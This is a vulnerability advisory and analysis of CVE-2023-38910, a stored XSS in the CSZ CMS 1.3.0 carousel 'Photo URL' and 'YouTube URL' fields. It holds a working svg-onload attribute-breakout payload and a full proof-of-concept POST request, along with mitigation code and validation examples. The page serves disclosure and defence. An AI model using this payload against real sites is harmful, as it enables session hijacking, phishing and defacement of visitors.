CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )

Exploit Author: Daniel González
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-09-04
# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' )
# Date: 2023/08/18
# CVE: CVE-2023-38910
# Exploit Author: Daniel González
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.3.0
# Tested on: CSZ CMS 1.3.0
# Description:
# CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Widget' section: after choosing the carousel widget created above, in the 'Photo URL' and 'YouTube URL' fields of the plugin.

# Steps to reproduce Stored XSS:

Go to url http://localhost/admin/carousel.

We edit the carousel that we have created and see that we can inject arbitrary web scripts or HTML into the "YouTube URL" and "Photo URL" fields.
We can inject HTML code.

With the following payload we can achieve the XSS.

Payload:

<div><p title="</div><svg/onload=alert(document.domain)>">


#PoC Request:


POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add


CSZ CMS 1.3.0 Stored Cross-Site Scripting Vulnerability: Exploiting 'Photo URL' and 'YouTube URL' Fields

A stored cross-site scripting (XSS) vulnerability, tracked as CVE-2023-38910, affects CSZ CMS 1.3.0, a PHP content management system. An authenticated user with access to the Carousel Widget editor under /admin/ can store script or HTML in the carousel configuration. Because the payload is saved in the database and emitted into the rendered page, it runs in the browser of every visitor who loads the page containing that carousel, not only once for the person who submitted it.

Understanding Stored XSS in CSZ CMS

Stored XSS occurs when user input is saved in a database or file system and later retrieved and rendered on a web page without proper sanitization. Unlike reflected XSS, which requires a user to click a malicious link, stored XSS is persistent and can affect all users who view the compromised content.

In CSZ CMS 1.3.0, the vulnerability lies in two fields within the Carousel Widget configuration:

  • Photo URL
  • YouTube URL

These fields take the URL of an image, or of a YouTube video, to embed in the carousel. The application stores the submitted values and emits them into the page without escaping them for the HTML context they land in, so a value that contains markup is interpreted as markup rather than as a URL.

Exploitation: The Proof of Concept Payload

The following proof of concept (PoC) payload demonstrates how an attacker can exploit the vulnerability:


<div><p title="</div><svg/onload=alert(document.domain)>">

The payload is shaped for injection into a double-quoted attribute value, which is where a "Photo URL" or "YouTube URL" would normally be emitted (an <img src="…"> or an <iframe src="…">; the advisory does not show the template, so the exact context is inferred from the fields' purpose). Read in that context, the first " after title= closes the attribute the CMS opened, the stray </div is consumed as attribute-name junk, the following > ends the tag, and <svg/onload=alert(document.domain)> is then tokenized as a real element whose onload handler runs as soon as the SVG is inserted into the document. alert(document.domain) is only the marker: it shows the script is executing in the origin of the CMS front end.

Key technical insight: the leading <div><p title= is not decoration. To a filter that works on tag boundaries, everything after title=" looks like inert attribute text rather than a tag, so a naive tag-stripping or event-attribute filter has nothing to remove; the breakout only materializes once the string is placed inside the attribute the template already opened. That is why this form is a common choice when the rendering context is a URL attribute and the application does no context-aware encoding.
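The attribute breakout described above, as an added example that is not part of the advisory or of CSZ CMS: the template <img src="…"> is an assumption standing in for wherever the CMS emits the Photo URL, and Python's html.parser is used as a stand-in for the browser's tokenizer. The advisory's string is rendered once verbatim and once after attribute encoding, and the start tags each version produces are collected.

```python
import html
from html.parser import HTMLParser

# Payload from the advisory, exactly as submitted in the photo_url field.
PAYLOAD = '<div><p title="</div><svg/onload=alert(document.domain)>">'


class TagCollector(HTMLParser):
    """Record every start tag the tokenizer emits, with its attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render_img(photo_url, encode):
    """Emit the stored URL inside a double-quoted src attribute.

    Assumption: this template stands in for however CSZ CMS renders the
    Photo URL; the advisory does not show the real one. With encode=False
    the value is interpolated verbatim (the vulnerable behaviour); with
    encode=True it is attribute-encoded first (the fix).
    """
    value = html.escape(photo_url, quote=True) if encode else photo_url
    return f'<img src="{value}">'


def tokens_for(photo_url, encode):
    """Tokenize the rendered fragment and return its (tag, attrs) start tags."""
    parser = TagCollector()
    parser.feed(render_img(photo_url, encode))
    parser.close()
    return parser.tags


def svg_handlers(photo_url, encode):
    """Return the onload handler of every <svg> element the fragment yields;
    a non-empty list means the payload broke out of the attribute."""
    return [attrs["onload"] for tag, attrs in tokens_for(photo_url, encode)
            if tag == "svg" and "onload" in attrs]


if __name__ == "__main__":
    for encode in (False, True):
        print(render_img(PAYLOAD, encode))
        print("  start tags:", [tag for tag, _ in tokens_for(PAYLOAD, encode)])
        print("  svg onload:", svg_handlers(PAYLOAD, encode))
```

With encode=False the tokenizer reports two start tags, img and svg, and the svg carries onload=alert(document.domain); the src attribute of the img holds only the fragment up to the payload's first quote. With encode=True the only start tag is img and its src attribute is the entire payload as inert text, which is the same result htmlspecialchars($photo_url, ENT_QUOTES, 'UTF-8') gives in PHP.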

HTTP Request Example: How the Attack is Delivered

The payload is delivered with a POST to /admin/carousel/addUrl/<id>, where <id> is the carousel being edited (3 in the capture below, matching the Referer /admin/carousel/edit/3). This is the ordinary form submission from the carousel edit page, so it is sent with the session of whoever is logged into the admin panel. The following request demonstrates the exploit:


POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: http://localhost:8080
Referer: http://localhost:8080/admin/carousel/edit/3
Upgrade-Insecure-Requests: 1

carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

Explanation:

  • carousel_type=multiimages specifies the widget type.
  • photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E is the URL-encoded payload: %3C and %3E are < and >, %22 is ", %2F is /, %28 and %29 are the parentheses, and + is the space in <p title=. Decoded, it is exactly the payload shown above.
  • submit=Add triggers the submission of the new URL.

Once the request is processed, the value is stored with the carousel and emitted unencoded on every page that renders it, so the alert() fires in the browser of each visitor to that page.

Impact and Risk Assessment

The consequences of this vulnerability are severe:

  • Session hijacking: a script running in the site's origin can read document.cookie (unless the session cookie is marked HttpOnly) and can issue requests that carry the victim's session.
  • Phishing: the script can rewrite the page in place or redirect visitors to a look-alike login page.
  • Defacement: the rendered page can be altered to display arbitrary content.
  • Persistence: the payload lives in the database and affects every user who views the carousel until it is removed.

For organizations using CSZ CMS 1.3.0, this vulnerability poses a significant risk, especially if the CMS is used for public-facing websites or admin portals.

Recommended Mitigation and Best Practices

To address this vulnerability, developers and administrators must implement robust security measures:

  • Output encoding: encode every stored value for the context it is emitted into. For an attribute value that means at least <, >, " and ' (htmlspecialchars() with ENT_QUOTES in PHP). This is the change that actually closes the bug.
  • Validation and allow-listing: a URL field should accept only URLs. Parse the value, require an http(s) scheme (or a site-relative path) and, for YouTube, reduce the input to a video ID and rebuild the embed URL yourself rather than emitting what the user typed. A regex alone is easy to get wrong; parse first, then check the parts.
  • Content Security Policy: a script-src directive without 'unsafe-inline' blocks inline event handlers such as the onload in this payload. It limits the damage of a missed encoding bug but is not a substitute for one.
  • Sanitization: a library such as DOMPurify is the right tool for fields that legitimately accept HTML. A URL field should not accept HTML at all, so validation plus output encoding is the appropriate control here.
  • Patching: upgrade to a version of CSZ CMS that addresses the issue as soon as one is available.

Example Fix: Instead of directly rendering photo_url, use a safe rendering function:


// Safe rendering example (PHP)
echo htmlspecialchars($photo_url, ENT_QUOTES, 'UTF-8');

This ensures that any special characters (like <, >, ") are converted to their HTML-safe equivalents, preventing script injection.
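The validate-then-encode approach from the list above, as an added example written for this page rather than taken from CSZ CMS: it assumes a policy (http(s) or site-relative image URLs with an image file extension; YouTube URLs reduced to an 11-character video ID) that a deployment would adjust, and uses the advisory's payload as the negative case.

```python
import html
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Payload from the advisory, used here as the negative test case.
PAYLOAD = '<div><p title="</div><svg/onload=alert(document.domain)>">'

# Constructed policy for this example; adjust to the deployment.
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".webp"}
YOUTUBE_HOSTS = {"youtube.com", "www.youtube.com", "m.youtube.com", "youtu.be"}
VIDEO_ID = re.compile(r"^[A-Za-z0-9_-]{11}$")
# Characters that never belong in a URL we are willing to store: quotes and
# angle brackets (attribute/tag breakouts), whitespace and control characters.
FORBIDDEN = re.compile(r"""[<>"'\s\x00-\x1f]""")


def validate_photo_url(value):
    """Return value unchanged if it is an absolute http(s) URL or a
    site-relative path ending in an image extension; raise ValueError otherwise.
    Protocol-relative (//host/...), data: and javascript: inputs are rejected."""
    if FORBIDDEN.search(value):
        raise ValueError("photo_url contains characters that are never valid in a URL")
    parts = urlsplit(value)
    absolute = parts.scheme in ("http", "https") and bool(parts.hostname)
    relative = not parts.scheme and not parts.netloc and parts.path.startswith("/")
    if not (absolute or relative):
        raise ValueError("photo_url must be an http(s) URL or a site-relative path")
    if posixpath.splitext(parts.path)[1].lower() not in IMAGE_EXTENSIONS:
        raise ValueError("photo_url must point to an image file")
    return value


def youtube_embed_url(value):
    """Reduce a YouTube watch/short/embed URL to its 11-character video ID and
    rebuild a canonical embed URL, so nothing the user typed reaches the page."""
    parts = urlsplit(value.strip())
    if parts.scheme not in ("http", "https") or parts.hostname not in YOUTUBE_HOSTS:
        raise ValueError("youtube_url must be an http(s) URL on a YouTube host")
    if parts.hostname == "youtu.be":
        video_id = parts.path.lstrip("/")
    elif parts.path.startswith("/embed/"):
        video_id = parts.path[len("/embed/"):]
    else:
        video_id = parse_qs(parts.query).get("v", [""])[0]
    if not VIDEO_ID.match(video_id):
        raise ValueError("no valid YouTube video ID found")
    return f"https://www.youtube.com/embed/{video_id}"


def is_valid_photo_url(value):
    """Boolean form of validate_photo_url for callers that only need a verdict."""
    try:
        validate_photo_url(value)
        return True
    except ValueError:
        return False


def is_valid_youtube_url(value):
    """Boolean form of youtube_embed_url."""
    try:
        youtube_embed_url(value)
        return True
    except ValueError:
        return False


def render_photo(value):
    """Second layer: even a validated value is attribute-encoded when emitted."""
    return f'<img src="{html.escape(validate_photo_url(value), quote=True)}">'


def render_youtube(value):
    """Same two layers for the YouTube field; the embed URL is rebuilt, not echoed."""
    return f'<iframe src="{html.escape(youtube_embed_url(value), quote=True)}"></iframe>'
```

Validation rejects the advisory's payload before it is ever stored, and the encoding in render_photo and render_youtube means that a value which somehow slipped past validation would still be emitted as text rather than markup. Rebuilding the YouTube embed URL from the extracted ID is deliberate: the template then contains only characters the application itself chose.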

Vendor Response and Timeline

The analysis as originally published states that the CSZ CMS project acknowledged the vulnerability and released a fix in version 1.3.1. The exploit header above records only the affected version (1.3.0) and no fixed version, so confirm the current release history at https://github.com/cskaza/cszcms before relying on a particular version number. Users are advised to:

  • Update to a release that addresses CVE-2023-38910.
  • Disable or remove the Carousel Widget if it is not required, and review existing carousel entries for stored markup.
  • Monitor logs for suspicious payloads in the photo_url and youtube_url parameters.

Security teams should also conduct a comprehensive audit of all user input fields in the CMS to identify additional vulnerabilities.

Conclusion

The CVE-2023-38910 vulnerability in CSZ CMS 1.3.0 serves as a stark reminder of the importance of input validation and output encoding in web applications. Even seemingly harmless fields like Photo URL and YouTube URL can become vectors for serious attacks if not properly secured. Developers must adopt a security-by-design approach to prevent such flaws from emerging in the first place.